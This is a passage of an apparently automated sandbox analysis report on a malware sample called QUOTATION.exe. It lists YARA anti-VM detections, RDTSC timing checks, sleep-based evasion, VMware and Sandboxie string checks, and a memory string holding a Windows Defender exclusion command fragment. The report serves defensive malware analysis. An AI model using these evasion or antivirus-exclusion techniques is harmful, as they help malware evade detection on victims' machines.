          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXE - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match - File source: 1.2.QUOTATION.exe.2751384.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match - File source: 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match - File source: 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match - File source: Process Memory Space: QUOTATION.exe PID: 6924, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: SBIEDLL.DLL
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\QUOTATION.exe - RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe - RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE - RDTSC instruction interceptor: First address: 0000000000739904 second address: 000000000073990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE - RDTSC instruction interceptor: First address: 0000000000739B7E second address: 0000000000739B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6928 - Thread sleep time: -38290s >= -30000s
          Source: C:\Users\user\Desktop\QUOTATION.exe TID: 6992 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676 - Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2808 - Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6172 - Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
          Source: C:\Windows\explorer.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXE - Last function: Thread delayed
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 7319
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 1199
          Source: C:\Users\user\Desktop\QUOTATION.exe - Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\QUOTATION.exe - Thread delayed: delay time: 38290
          Source: C:\Users\user\Desktop\QUOTATION.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp - Binary or memory string: War&Prod_VMware_SATA
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: vmware
          Source: explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000013.00000000.304892797.00000000067BE000.00000004.00000001.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp - Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\QUOTATION.exe - Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION.exe - Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE - Process token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01002990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01057016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01092073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01053884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0106B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0106B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0109131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01003B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0109138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0108D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01002397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01004BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010823E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0109AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01014A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01064257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0109EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0108B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_010A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0101927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_0100FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_00FDDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01002ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01002AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exe - Code function: 17_2_01094AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFA309 mov eax, dword ptr fs:[00000030h]17_2_00FFA309
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109E539 mov eax, dword ptr fs:[00000030h]17_2_0109E539
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0105A537 mov eax, dword ptr fs:[00000030h]17_2_0105A537
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h]17_2_01004D3B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A8D34 mov eax, dword ptr fs:[00000030h]17_2_010A8D34
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01013D43 mov eax, dword ptr fs:[00000030h]17_2_01013D43
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01053540 mov eax, dword ptr fs:[00000030h]17_2_01053540
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01083D40 mov eax, dword ptr fs:[00000030h]17_2_01083D40
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FE849B mov eax, dword ptr fs:[00000030h]17_2_00FE849B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01002581 mov eax, dword ptr fs:[00000030h]17_2_01002581
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h]17_2_00FFB477
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h]17_2_01092D82
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_00FF746D mov eax, dword ptr fs:[00000030h]17_2_00FF746D
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]17_2_0100FD9B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h]17_2_0100FD9B
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010035A1 mov eax, dword ptr fs:[00000030h]17_2_010035A1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]17_2_010A05AC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h]17_2_010A05AC
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h]17_2_01001DB5
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov ecx, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h]17_2_01056DC9
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h]17_2_0109FDE2
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_01088DF1 mov eax, dword ptr fs:[00000030h]17_2_01088DF1
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 17_2_010A740D mov eax, dword ptr fs:[00000030h]17_2_010A740D
